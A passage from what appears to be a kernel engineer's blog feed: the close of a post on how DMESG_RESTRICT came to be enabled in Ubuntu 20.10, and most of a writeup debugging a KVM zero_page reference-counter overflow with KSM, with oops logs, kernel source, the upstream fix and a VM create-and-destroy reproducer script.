<p><a href="https://www.phoronix.com/scan.php?page=news_item&px=Ubuntu-20.10-Restrict-dmesg">Ubuntu 20.10 Looking At Restricting Access To Kernel Logs With dmesg</a></p>
<p>This wasn’t expected at all, and it got people talking about the change in
forums, instead of it just being silently made and me hoping that no one noticed.</p>
<p>After that, Seth Forshee, from the kernel team, double checked with the security
team, and then went ahead and applied the change to the “unstable” kernel tree,
since Groovy’s kernel had not yet forked off from it at that point in time.</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-July/041079.html">https://lists.ubuntu.com/archives/ubuntu-devel/2020-July/041079.html</a></p>
<p>The kernel commit is:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>Commit 25e6c851704a47c81e78e1a82530ac4b328098a6
From: Seth Forshee <seth.forshee@canonical.com>
Date: Thu, 2 Jul 2020 13:29:55 -0500
Subject: UBUNTU: [Config] CONFIG_SECURITY_DMESG_RESTRICT=y
Link: https://kernel.ubuntu.com/git/ubuntu/unstable.git/commit/?id=25e6c851704a47c81e78e1a82530ac4b328098a6
</code></pre></div></div>
<p>Now that the configuration change was made in the kernel, Number 1 in the
list was completed.</p>
<h2 id="upstream-discussions-for-adding-cap_syslog-to-bindmesg-2">Upstream Discussions for Adding CAP_SYSLOG to /bin/dmesg (2)</h2>
<p>At this point, things got a bit stuck. I got busy and no one else replied to my
previous posts, so the changes to <code class="language-plaintext highlighter-rouge">util-linux</code> got a little delayed.</p>
<p>I restarted these talks with the below message to <code class="language-plaintext highlighter-rouge">ubuntu-devel</code>, and included
the upstream Debian maintainers to the CC list.</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041117.html">https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041117.html</a></p>
<p>This was successful, and Chris Hofstaedtler, wrote back. Chris asked if this had
been discussed before in Debian:</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041118.html">https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041118.html</a></p>
<p>I responded with what I could find, but I also mentioned that I would write
to <code class="language-plaintext highlighter-rouge">debian-devel</code>.</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041125.html">https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041125.html</a></p>
<p>So, I went and proposed similar changes to <code class="language-plaintext highlighter-rouge">debian-devel</code> in this thread:</p>
<p><a href="https://lists.debian.org/debian-devel/2020/08/msg00107.html">https://lists.debian.org/debian-devel/2020/08/msg00107.html</a></p>
<p>I got some positive responses, but the most interesting one was from Ansgar:</p>
<p><a href="https://lists.debian.org/debian-devel/2020/08/msg00121.html">https://lists.debian.org/debian-devel/2020/08/msg00121.html</a></p>
<p>Ansgar mentioned that if <code class="language-plaintext highlighter-rouge">/bin/dmesg</code> is granted <code class="language-plaintext highlighter-rouge">CAP_SYSLOG</code>, and <code class="language-plaintext highlighter-rouge">/bin/dmesg</code>
was opened up to users of group <code class="language-plaintext highlighter-rouge">adm</code>, then any user of <code class="language-plaintext highlighter-rouge">adm</code> could clear the
kernel log buffer by running <code class="language-plaintext highlighter-rouge">$ dmesg --clear</code>.</p>
<p>Now, I had missed this, and it was an excellent catch.</p>
<p>We don’t want to make it easier for anyone to clear the kernel log buffer, since
it can be used to hide an attackers presence, so adding <code class="language-plaintext highlighter-rouge">CAP_SYSLOG</code> to <code class="language-plaintext highlighter-rouge">/bin/dmesg</code>
is a bad idea.</p>
<p>Chris mentions this in his message back:</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041151.html">https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041151.html</a></p>
<p>From there, Steve Langasek also mentioned that it was a bad idea:</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041152.html">https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041152.html</a></p>
<p>and with that, I decided to drop the idea of adding <code class="language-plaintext highlighter-rouge">CAP_SYSLOG</code> to <code class="language-plaintext highlighter-rouge">/bin/dmesg</code>
and changing the group to <code class="language-plaintext highlighter-rouge">adm</code>:</p>
<p><a href="https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041153.html">https://lists.ubuntu.com/archives/ubuntu-devel/2020-August/041153.html</a></p>
<p>That makes Number 2 on the list struck off. It’s a bit of a pity, since it means
that users in group <code class="language-plaintext highlighter-rouge">adm</code> have to write <code class="language-plaintext highlighter-rouge">$ sudo dmesg</code> instead of <code class="language-plaintext highlighter-rouge">$ dmesg</code>.
Hopefully it won’t be too much of a bother to become superuser to view dmesg.
Time will tell I suppose, and most distros follow this behaviour anyway.</p>
<h2 id="landing-sysctl-configuration-changes-3">Landing sysctl Configuration Changes (3)</h2>
<p>Shortly after the upstream <code class="language-plaintext highlighter-rouge">util-linux</code> discussion ended, Brian Murrary sponsored
my patches to <code class="language-plaintext highlighter-rouge">procps</code> to add some documentation about <code class="language-plaintext highlighter-rouge">CONFIG_SECURITY_DMESG_RESTRICT</code>
and instructions on how to disable it by changing a sysctl variable.</p>
<p><img src="/assets/images/2020_023.png" alt="sysctl" /></p>
<p>As my description states, if you want to turn off <code class="language-plaintext highlighter-rouge">DMESG_RESTRICT</code>, you can
do so by uncommenting the sysctl string <code class="language-plaintext highlighter-rouge">kernel.dmesg_restrict = 0</code>, and
rebooting.</p>
<p>With this, Number 3 in the list was completed.</p>
<h1 id="conclusion">Conclusion</h1>
<p>That is the story of how <code class="language-plaintext highlighter-rouge">DMESG_RESTRICT</code> was enabled in Ubuntu 20.10 Groovy
Gorilla. We covered how it slightly improves system security by removing an avenue
attackers could use to view leaked kernel pointers, the process of getting all
the separate changes landed, and relevant upstream discussions.</p>
<p>I hope you enjoyed the read, and if you have any questions or comments, feel
free to <a href="/about">contact me</a>.</p>
<p>Matthew Ruffell</p>Matthew RuffellYou might have noticed a small change when running the dmesg command in Ubuntu 20.10 Groovy Gorilla, since it now errors out with: dmesg: read kernel buffer failed: Operation not permitted Don’t worry, it still works, it has just become a privileged operation, and it works fine with sudo dmesg. But why the change? Well, I happen to be the one who proposed for this change to be made, and followed up on getting the configuration changes made. This blog post will describe how it slightly improves the security of Ubuntu, and the journey to getting the changes landed in a release. So stay tuned, and let’s dive into dmesg.Debugging a Zero Page Reference Counter Overflow on the Ubuntu 4.15 Kernel2020-09-02T00:00:00+00:002020-09-02T00:00:00+00:00https://ruffell.nz/programming/writeups/2020/09/02/debugging-a-zero-page-reference-counter-overflow-on-4-15-kernel<p>Recently I worked a particularly interesting case where an OpenStack compute node
had all of its virtual machines pause at the same time, which I attributed to
a reference counter overflowing in the kernel’s <code class="language-plaintext highlighter-rouge">zero_page</code>.</p>
<p>Today, we are going to take a in-depth look at the problem at hand, and see how
I debugged and fixed the issue, from beginning to completion.</p>
<p><img src="/assets/images/2020_019.png" alt="hero" /></p>
<p>Let’s get started.</p>
<!--more-->
<h1 id="problem-description">Problem Description</h1>
<p>The first thing to do with any problem is to understand what happened, and gather
as much data as possible.</p>
<p>Having a look at the case, the complaint is that a OpenStack compute node
running on 16.04 LTS with the Xenial-Queens cloud archive enabled suffered a
failure where all virtual machines were paused at once. The node was running
the 4.15 Xenial HWE kernel, so this system is more or less built with Bionic
components ontop of Xenial.</p>
<p>The logs show various QEMU errors and a crash, as well as a kernel oops. Let’s
have a look.</p>
<p>From syslog:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>error : qemuMonitorJSONCheckError:392 : internal error: unable to execute QEMU command 'cont': Resetting the Virtual Machine is required
</code></pre></div></div>
<p>From QEMU Logs:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>error: kvm run failed Bad address
EAX=000afe00 EBX=0000000b ECX=00000080 EDX=00000cfe
ESI=0003fe00 EDI=000afe00 EBP=00000007 ESP=00006d74
EIP=000ee344 EFL=00010002 [-------] CPL=0 II=0 A20=1 SMM=0 HLT=0
ES =0010 00000000 ffffffff 00c09300 DPL=0 DS [-WA]
CS =0008 00000000 ffffffff 00c09b00 DPL=0 CS32 [-RA]
SS =0010 00000000 ffffffff 00c09300 DPL=0 DS [-WA]
DS =0010 00000000 ffffffff 00c09300 DPL=0 DS [-WA]
FS =0010 00000000 ffffffff 00c09300 DPL=0 DS [-WA]
GS =0010 00000000 ffffffff 00c09300 DPL=0 DS [-WA]
LDT=0000 00000000 0000ffff 00008200 DPL=0 LDT
TR =0000 00000000 0000ffff 00008b00 DPL=0 TSS32-busy
GDT= 000f7040 00000037
IDT= 000f707e 00000000
CR0=00000011 CR2=00000000 CR3=00000000 CR4=00000000
DR0=0000000000000000 DR1=0000000000000000 DR2=0000000000000000 DR3=0000000000000000
DR6=00000000ffff0ff0 DR7=0000000000000400
EFER=0000000000000000
Code=c3 57 56 b8 00 fe 0a 00 be 00 fe 03 00 b9 80 00 00 00 89 c7 <f3> a5 a1 00 80 03 00 8b 15 04 80 03 00 a3 00 80 0a 00 89 15 04 80 0a 00 b8 ae e2 00 00 31
</code></pre></div></div>
<p>Finally, the kernel oops:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code> [3191370.893495] WARNING: CPU: 13 PID: 48929 at /build/linux-hwe-FEhT7y/linux-hwe-4.15.0/include/linux/mm.h:852 follow_page_pte+0x6f4/0x710
[3191370.893552] CPU: 13 PID: 48929 Comm: CPU 0/KVM Not tainted 4.15.0-106-generic #107~16.04.1-Ubuntu
[3191370.893552] Hardware name: Dell Inc. PowerEdge R740xd/00WGD1, BIOS 2.6.4 04/09/2020
[3191370.893554] RIP: 0010:follow_page_pte+0x6f4/0x710
[3191370.893555] RSP: 0018:ffffad279f7ab908 EFLAGS: 00010286
[3191370.893556] RAX: ffffdc0fa72eba80 RBX: ffffdc0f9b1535b0 RCX: 0000000080000000
[3191370.893556] RDX: 0000000000000000 RSI: 00003ffffffff000 RDI: 800000b9cbaea225
[3191370.893557] RBP: ffffad279f7ab970 R08: 800000b9cbaea225 R09: ffff9359857fd5f0
[3191370.893558] R10: 0000000000000000 R11: 0000000000000000 R12: ffffdc0fa72eba80
[3191370.893558] R13: 0000000000000326 R14: ffff935de09e19e0 R15: ffff9359857fd5f0
[3191370.893559] FS: 00007f68757fa700(0000) GS:ffff93617ef80000(0000) knlGS:ffff964a7fc00000
[3191370.893559] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[3191370.893560] CR2: 00007ff92ca7a000 CR3: 000000b7209d2005 CR4: 00000000007626e0
[3191370.893561] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[3191370.893561] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[3191370.893561] PKRU: 55555554
[3191370.893562] Call Trace:
[3191370.893565] follow_pmd_mask+0x273/0x630
[3191370.893567] ? gup_pgd_range+0x23f/0xde0
[3191370.893568] follow_page_mask+0x178/0x230
[3191370.893569] __get_user_pages+0xb8/0x740
[3191370.893571] get_user_pages+0x42/0x50
[3191370.893604] __gfn_to_pfn_memslot+0x18b/0x3b0 [kvm]
[3191370.893615] ? mmu_set_spte+0x1dd/0x3a0 [kvm]
[3191370.893626] try_async_pf+0x66/0x220 [kvm]
[3191370.893635] tdp_page_fault+0x14b/0x2b0 [kvm]
[3191370.893640] ? vmexit_fill_RSB+0x10/0x40 [kvm_intel]
[3191370.893649] kvm_mmu_page_fault+0x62/0x180 [kvm]
[3191370.893651] handle_ept_violation+0xbc/0x160 [kvm_intel]
[3191370.893654] vmx_handle_exit+0xa5/0x580 [kvm_intel]
[3191370.893664] vcpu_enter_guest+0x414/0x1260 [kvm]
[3191370.893674] kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
[3191370.893683] ? kvm_arch_vcpu_ioctl_run+0xd9/0x3d0 [kvm]
[3191370.893691] kvm_vcpu_ioctl+0x33a/0x610 [kvm]
[3191370.893693] ? audit_filter_rules+0x232/0x1070
[3191370.893696] do_vfs_ioctl+0xa4/0x600
[3191370.893697] ? __audit_syscall_entry+0xac/0x100
[3191370.893699] ? syscall_trace_enter+0x1d6/0x2f0
[3191370.893700] SyS_ioctl+0x79/0x90
[3191370.893701] do_syscall_64+0x73/0x130
[3191370.893704] entry_SYSCALL_64_after_hwframe+0x3d/0xa2
[3191370.893705] RIP: 0033:0x7f68c81b4f47
[3191370.893706] RSP: 002b:00007f68757f98b8 EFLAGS: 00000246 ORIG_RAX: 0000000000000010
[3191370.893707] RAX: ffffffffffffffda RBX: 000000000000ae80 RCX: 00007f68c81b4f47
[3191370.893707] RDX: 0000000000000000 RSI: 000000000000ae80 RDI: 0000000000000031
[3191370.893708] RBP: 000055ac785ae320 R08: 000055ac77357310 R09: 00000000000000ff
[3191370.893708] R10: 0000000000000001 R11: 0000000000000246 R12: 0000000000000000
[3191370.893708] R13: 00007f68cd582000 R14: 0000000000000000 R15: 000055ac785ae320
[3191370.893709] Code: 4d 63 e6 e9 f2 fc ff ff 4c 89 45 d0 48 8b 47 10 e8 22 f0 9e 00 4c 8b 45 d0 e9 89 fc ff ff 4c 89 e7 e8 81 3f fd ff e9 aa fc ff ff <0f> 0b 49 c7 c4 f4 ff ff ff e9 c1 fc ff ff 0f 1f 40 00 66 2e 0f
</code></pre></div></div>
<p>Since the kernel oops mentions a few functions in the KVM module, and we know
that all VMs were paused at the same time, we are probably looking at a kernel
problem and not a problem in QEMU or OpenStack.</p>
<p>Looking at the system time, 3191370 seconds is 36.93 days, which is quite a long
time, so this fault is likely something that takes time to hit. Time to start
digging.</p>
<h1 id="analysis-of-kernel-oops">Analysis of Kernel Oops</h1>
<p>Looking at the call trace in the kernel oops, we see that an EPT (Extended Page
Table) violation has happened, with the call to <code class="language-plaintext highlighter-rouge">handle_ept_violation()</code>
in the <code class="language-plaintext highlighter-rouge">kvm_intel</code> module.</p>
<p>Right after that, we page fault with <code class="language-plaintext highlighter-rouge">kvm_mmu_page_fault()</code>, which calls
<code class="language-plaintext highlighter-rouge">tdp_page_fault()</code>.</p>
<p>From there, the kernel goes on a goose chase to try locate a particular page,
with calls to <code class="language-plaintext highlighter-rouge">get_user_pages()</code>, <code class="language-plaintext highlighter-rouge">follow_page_mask()</code>, <code class="language-plaintext highlighter-rouge">gup_pgd_range()</code> and
<code class="language-plaintext highlighter-rouge">follow_pmd_mask()</code>.</p>
<p>We crash at <code class="language-plaintext highlighter-rouge">follow_page_pte+0x6f4</code>, which is mentioned in <code class="language-plaintext highlighter-rouge">RIP</code>.</p>
<p>Okay, so the next step is to read the code at <code class="language-plaintext highlighter-rouge">follow_page_pte+0x6f4</code>, so we
download the <a href="http://ddebs.ubuntu.com/ubuntu/pool/main/l/linux-hwe/linux-image-unsigned-4.15.0-106-generic-dbgsym_4.15.0-106.107~16.04.1_amd64.ddeb">debug kernel ddeb</a>, for Xenial HWE, and save it to disk.</p>
<p>From there we can extract it, and query the file and line of code with <code class="language-plaintext highlighter-rouge">eu-addr2line</code>:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>$ dpkg -x linux-image-unsigned-4.15.0-106-generic-dbgsym_4.15.0-106.107~16.04.1_amd64.ddeb linux
$ cd linux/usr/lib/debug/boot
$ eu-addr2line -e ./vmlinux-4.15.0-106-generic -f follow_page_pte+0x6f4
try_get_page inlined at /build/linux-hwe-FEhT7y/linux-hwe-4.15.0/mm/gup.c:156 in follow_page_pte
/build/linux-hwe-FEhT7y/linux-hwe-4.15.0/mm/gup.c:170
</code></pre></div></div>
<p>Okay, this is interesting. Let’s jump to mm/gup.c:156 in the 4.15 kernel source
tree, and see we are in <code class="language-plaintext highlighter-rouge">follow_page_pte()</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="mi">73</span> <span class="k">static</span> <span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="nf">follow_page_pte</span><span class="p">(</span><span class="k">struct</span> <span class="n">vm_area_struct</span> <span class="o">*</span><span class="n">vma</span><span class="p">,</span>
<span class="mi">74</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">address</span><span class="p">,</span> <span class="n">pmd_t</span> <span class="o">*</span><span class="n">pmd</span><span class="p">,</span> <span class="kt">unsigned</span> <span class="kt">int</span> <span class="n">flags</span><span class="p">)</span>
<span class="mi">75</span> <span class="p">{</span>
<span class="p">...</span>
<span class="mi">155</span> <span class="k">if</span> <span class="p">(</span><span class="n">flags</span> <span class="o">&</span> <span class="n">FOLL_GET</span><span class="p">)</span> <span class="p">{</span>
<span class="mi">156</span> <span class="k">if</span> <span class="p">(</span><span class="n">unlikely</span><span class="p">(</span><span class="o">!</span><span class="n">try_get_page</span><span class="p">(</span><span class="n">page</span><span class="p">)))</span> <span class="p">{</span>
<span class="mi">157</span> <span class="n">page</span> <span class="o">=</span> <span class="n">ERR_PTR</span><span class="p">(</span><span class="o">-</span><span class="n">ENOMEM</span><span class="p">);</span>
<span class="mi">158</span> <span class="k">goto</span> <span class="n">out</span><span class="p">;</span>
<span class="mi">159</span> <span class="p">}</span>
<span class="p">...</span>
</code></pre></div></div>
<p>See the call to <code class="language-plaintext highlighter-rouge">try_get_page()</code>? It was actually mentioned in the <code class="language-plaintext highlighter-rouge">eu-addr2line</code>
output, as it mentions that we are executing an inlined <code class="language-plaintext highlighter-rouge">try_get_page()</code>.</p>
<p>Lets look up <code class="language-plaintext highlighter-rouge">try_get_page()</code>. <code class="language-plaintext highlighter-rouge">try_get_page()</code> is located in <code class="language-plaintext highlighter-rouge">include/linux/mm.h:852</code>,
which is mentioned at the top of the oops message:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="mi">849</span> <span class="k">static</span> <span class="kr">inline</span> <span class="n">__must_check</span> <span class="n">bool</span> <span class="nf">try_get_page</span><span class="p">(</span><span class="k">struct</span> <span class="n">page</span> <span class="o">*</span><span class="n">page</span><span class="p">)</span>
<span class="mi">850</span> <span class="p">{</span>
<span class="mi">851</span> <span class="n">page</span> <span class="o">=</span> <span class="n">compound_head</span><span class="p">(</span><span class="n">page</span><span class="p">);</span>
<span class="mi">852</span> <span class="k">if</span> <span class="p">(</span><span class="n">WARN_ON_ONCE</span><span class="p">(</span><span class="n">page_ref_count</span><span class="p">(</span><span class="n">page</span><span class="p">)</span> <span class="o"><=</span> <span class="mi">0</span><span class="p">))</span>
<span class="mi">853</span> <span class="k">return</span> <span class="nb">false</span><span class="p">;</span>
<span class="mi">854</span> <span class="nf">page_ref_inc</span><span class="p">(</span><span class="n">page</span><span class="p">);</span>
<span class="mi">855</span> <span class="k">return</span> <span class="nb">true</span><span class="p">;</span>
<span class="mi">856</span> <span class="err">}</span>
</code></pre></div></div>
<p><code class="language-plaintext highlighter-rouge">if (WARN_ON_ONCE(page_ref_count(page) <= 0))</code> looks like a check to ensure that
this page’s reference counter has not overflowed and wrapped around into negatives.</p>
<p>If we hit this warning and oopsed, then we must have overflowed the page’s
reference counter somehow. We now need to figure out which page, and why.</p>
<h1 id="finding-the-commit-with-the-fix">Finding the Commit with the Fix</h1>
<p>At this point, I did some searching on some mailing lists, and the upstream kernel
git tree. I got lucky and came across the below commit rather quickly:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>commit 7df003c85218b5f5b10a7f6418208f31e813f38f
Author: Zhuang Yanying <ann.zhuangyanying@huawei.com>
Date: Sat Oct 12 11:37:31 2019 +0800
Subject: KVM: fix overflow of zero page refcount with ksm running
Link: https://github.com/torvalds/linux/commit/7df003c85218b5f5b10a7f6418208f31e813f38f
</code></pre></div></div>
<p>The description mentions that the patch authors were testing starting and
stopping virtual machines with Kernel Samepage Mapping (KSM) enabled on the
compute node. They found a reference counter overflow on the <code class="language-plaintext highlighter-rouge">zero_page</code>,
as the counter gets incremented in <code class="language-plaintext highlighter-rouge">try_async_pf()</code>, which is present in our
call trace, while not being decremented in <code class="language-plaintext highlighter-rouge">mmu_set_spte()</code>, which is also present,
while handling an EPT violation.</p>
<p>Kernel Samepage Mapping is a kernel feature that allows pages to be merged into
each other, and is used in KVM. It allows you to overload the memory of a compute
node, for example, 100GB of ram on a node with only 64GB of ram. It works by
merging the “same” pages together across different virtual machines.</p>
<p>In this case, the problem is centred around the <code class="language-plaintext highlighter-rouge">zero_page</code>, which is special,
as it is a reserved page. If you allocate a new virtual machine, it will allocate
many new pages full of zeros. To save space, these pages aren’t actually allocated.</p>
<p>Instead, we use <code class="language-plaintext highlighter-rouge">zero_page</code>. The <code class="language-plaintext highlighter-rouge">zero_page</code> is a page full of zeros. For each
would be newly allocated page that would be full of zeros, we simply set them
to reference the <code class="language-plaintext highlighter-rouge">zero_page</code>. This increments the <code class="language-plaintext highlighter-rouge">zero_page</code> reference counter.</p>
<p>When the VM wants to write data to one of those pages, a EPT violation happens,
and we page fault. This triggers a copy-on-write (COW) action, that allocates a
new page where the data can be written to.</p>
<p>In this case, each time we enter <code class="language-plaintext highlighter-rouge">try_async_pf()</code> we increment the reference
counter for the <code class="language-plaintext highlighter-rouge">zero_page</code>, but it never gets decremented.</p>
<p>The commit description also includes a kernel oops and QEMU crash log, and it
very closely matches what we found in the OpenStack compute node.</p>
<p>Looking at the logs from the compute node, we also see that KSM is enabled on
the system:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span><span class="nb">cat </span>sosreport/sys/kernel/mm/ksm/run
1
</code></pre></div></div>
<p>Looks like we have our root cause.</p>
<p>The fix itself is pretty simple:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>diff --git a/virt/kvm/kvm_main.c b/virt/kvm/kvm_main.c
index 7e63a32363640..67ae2d5c37b23 100644
--- a/virt/kvm/kvm_main.c
+++ b/virt/kvm/kvm_main.c
@@ -186,6 +186,7 @@ bool kvm_is_reserved_pfn(kvm_pfn_t pfn)
*/
if (pfn_valid(pfn))
return PageReserved(pfn_to_page(pfn)) &&
+ !is_zero_pfn(pfn) &&
!kvm_is_zone_device_pfn(pfn);
return true;
</code></pre></div></div>
<p>The fix stops treating the <code class="language-plaintext highlighter-rouge">zero_page</code> as reserved in <code class="language-plaintext highlighter-rouge">kvm_is_reserved_pfn()</code>
which seems to prevent the reference counter from being incremented in higher
functions.</p>
<h1 id="attempting-to-reproduce-the-problem">Attempting to Reproduce the Problem</h1>
<p>At this point, I went and built a test kernel based on 4.15.0-106-generic and
included the commit we found. But we now need to reproduce the problem to prove
that the commit actually fixes the problem.</p>
<p>The commit mentions some instructions on how to reproduce the problem:</p>
<div class="language-plaintext highlighter-rouge"><div class="highlight"><pre class="highlight"><code>step1:
echo 10000 > /sys/kernel/pages_to_scan/pages_to_scan
echo 1 > /sys/kernel/pages_to_scan/run
echo 1 > /sys/kernel/pages_to_scan/use_zero_pages
step2:
just create several normal qemu kvm vms.
And destroy it after 10s.
Repeat this action all the time.
</code></pre></div></div>
<p>Okay, so it ups the number of pages to scan, enables KSM and the <code class="language-plaintext highlighter-rouge">use_zero_pages</code>
feature. From there I need to create and destroy a bunch of virtual machines
in a loop. It doesn’t sound too hard.</p>
<p>If we remember the OpenStack compute node’s uptime of 37 days, and that the
reference counter is a signed integer, which means we would need ~2.5 billion
increments to wrap the reference counter into negatives, with a 32 bit atomic_t
variable.</p>
<p>This might take a while.</p>
<p>I wrote a script that uses libvirt to create and destroy virtual machines,
which runs more or less forever:</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">#!/bin/bash</span>
<span class="c"># Script to start and stop KVM virtual machines to try trigger Kernel Samepage</span>
<span class="c"># Mapping zero_page reference counter overflow.</span>
<span class="c">#</span>
<span class="c"># Author: Matthew Ruffell <matthew.ruffell@canonical.com></span>
<span class="c"># BugLink: https://bugs.launchpad.net/bugs/1837810</span>
<span class="c">#</span>
<span class="c"># Fix: https://github.com/torvalds/linux/commit/7df003c85218b5f5b10a7f6418208f31e813f38f</span>
<span class="c">#</span>
<span class="c"># Instructions:</span>
<span class="c"># ./ksm_refcnt_overflow.sh</span>
<span class="c"># Install QEMU KVM if needed</span>
<span class="nb">sudo </span>apt <span class="nb">install</span> <span class="nt">-y</span> qemu-kvm libvirt-bin qemu-utils genisoimage virtinst
<span class="c"># Enable Kernel Samepage Mapping, use zero_pages</span>
<span class="nb">echo </span>10000 | <span class="nb">sudo tee</span> /sys/kernel/mm/ksm/pages_to_scan
<span class="nb">echo </span>1 | <span class="nb">sudo tee</span> /sys/kernel/mm/ksm/run
<span class="nb">echo </span>1 | <span class="nb">sudo tee</span> /sys/kernel/mm/ksm/use_zero_pages
<span class="c"># Download OS image</span>
wget https://cloud-images.ubuntu.com/xenial/current/xenial-server-cloudimg-amd64-disk1.img
<span class="nb">sudo mkdir</span> /var/lib/libvirt/images/base
<span class="nb">sudo mv </span>xenial-server-cloudimg-amd64-disk1.img /var/lib/libvirt/images/base/ubuntu-16.04.qcow2
<span class="k">function </span>destroy_all_vms<span class="o">()</span> <span class="o">{</span>
<span class="k">for </span>i <span class="k">in</span> <span class="sb">`</span><span class="nb">sudo </span>virsh list | <span class="nb">grep </span>running | <span class="nb">awk</span> <span class="s1">'{print $2}'</span><span class="sb">`</span>
<span class="k">do
</span>virsh shutdown <span class="nv">$i</span> &> /dev/null
virsh destroy <span class="nv">$i</span> &> /dev/null
virsh undefine <span class="nv">$i</span> &> /dev/null
<span class="nb">sudo rm</span> <span class="nt">-rf</span> /var/lib/libvirt/images/<span class="nv">$i</span>
<span class="k">done</span>
<span class="o">}</span>
<span class="k">function </span>create_single_vm<span class="o">()</span> <span class="o">{</span>
<span class="nb">sudo mkdir</span> /var/lib/libvirt/images/instance-<span class="nv">$1</span>
<span class="nb">sudo cp</span> /var/lib/libvirt/images/base/ubuntu-16.04.qcow2 /var/lib/libvirt/images/instance-<span class="nv">$1</span>/instance-<span class="nv">$1</span>.qcow2
virt-install <span class="nt">--connect</span> qemu:///system <span class="se">\</span>
<span class="nt">--virt-type</span> kvm <span class="se">\</span>
<span class="nt">--name</span> instance-<span class="nv">$1</span> <span class="se">\</span>
<span class="nt">--ram</span> 1024 <span class="se">\</span>
<span class="nt">--vcpus</span><span class="o">=</span>1 <span class="se">\</span>
<span class="nt">--os-type</span> linux <span class="se">\</span>
<span class="nt">--os-variant</span> ubuntu16.04 <span class="se">\</span>
<span class="nt">--disk</span> <span class="nv">path</span><span class="o">=</span>/var/lib/libvirt/images/instance-<span class="nv">$1</span>/instance-<span class="nv">$1</span>.qcow2,format<span class="o">=</span>qcow2 <span class="se">\</span>
<span class="nt">--import</span> <span class="se">\</span>
<span class="nt">--network</span> <span class="nv">network</span><span class="o">=</span>default <span class="se">\</span>
<span class="nt">--noautoconsole</span> &> /dev/null
<span class="o">}</span>
<span class="k">function </span>create_destroy_loop<span class="o">()</span> <span class="o">{</span>
<span class="nv">NUM</span><span class="o">=</span><span class="s2">"0"</span>
<span class="k">while </span><span class="nb">true
</span><span class="k">do
</span><span class="nv">NUM</span><span class="o">=</span><span class="nv">$[$NUM</span> + 1]
<span class="nb">echo</span> <span class="s2">"Run #</span><span class="nv">$NUM</span><span class="s2">"</span>
<span class="k">for </span>i <span class="k">in</span> <span class="o">{</span>0..7<span class="o">}</span>
<span class="k">do
</span>create_single_vm <span class="nv">$i</span>
<span class="nb">echo</span> <span class="s2">"Created instance </span><span class="nv">$i</span><span class="s2">"</span>
<span class="nb">sleep </span>10
<span class="k">done
</span><span class="nb">sleep </span>30
<span class="nb">echo</span> <span class="s2">"Destroying all VMs"</span>
destroy_all_vms
<span class="k">done</span>
<span class="o">}</span>
create_destroy_loop
</code></pre></div></div>
<p>You can download the script <a href="/assets/bin/ksm_refcnt_overflow.sh">here</a>.</p>
<p>The script makes sure that KSM is enabled, it installs and sets up KVM, and
gets busy creating and destroying virtual machines every 10 seconds or so.</p>
<p>I provisioned a lab machine that was a bit more beefy than usual and started
running the script.</p>
<p>I left the lab machine running for a few days, and I checked it every day to see
if it had crashed, or if it was happily creating and destroying virtual machines.</p>
<p>After about 3 or 4 days I got a bit bored, and started wondering if we could see
the value of the zero_page reference counter to try and see how far along we
are to overflow.</p>
<p>I was talking to some colleagues, and one mentioned that I should be able to use
<code class="language-plaintext highlighter-rouge">crash</code> to view live kernel memory, as long as I have the right debug kernel.</p>
<p>So, I installed <code class="language-plaintext highlighter-rouge">crash</code> and the debug kernel on the lab machine, and had a look.</p>
<p>Looking at the kernel source code, it seems the kernel allocated the <code class="language-plaintext highlighter-rouge">zero_page</code>
as <code class="language-plaintext highlighter-rouge">empty_zero_page</code>, in <code class="language-plaintext highlighter-rouge">arch/x86/include/asm/pgtable.h</code>:</p>
<div class="language-c highlighter-rouge"><div class="highlight"><pre class="highlight"><code> <span class="mi">43</span> <span class="cm">/*
44 * ZERO_PAGE is a global shared page that is always zero: used
45 * for zero-mapped memory areas etc..
46 */</span>
<span class="mi">47</span> <span class="k">extern</span> <span class="kt">unsigned</span> <span class="kt">long</span> <span class="n">empty_zero_page</span><span class="p">[</span><span class="n">PAGE_SIZE</span> <span class="o">/</span> <span class="k">sizeof</span><span class="p">(</span><span class="kt">unsigned</span> <span class="kt">long</span><span class="p">)]</span>
<span class="mi">48</span> <span class="n">__visible</span><span class="p">;</span>
<span class="mi">49</span> <span class="err">#</span><span class="n">define</span> <span class="n">ZERO_PAGE</span><span class="p">(</span><span class="n">vaddr</span><span class="p">)</span> <span class="p">(</span><span class="n">virt_to_page</span><span class="p">(</span><span class="n">empty_zero_page</span><span class="p">))</span>
</code></pre></div></div>
<p>We can look up the memory address of <code class="language-plaintext highlighter-rouge">empty_zero_page</code> with:</p>
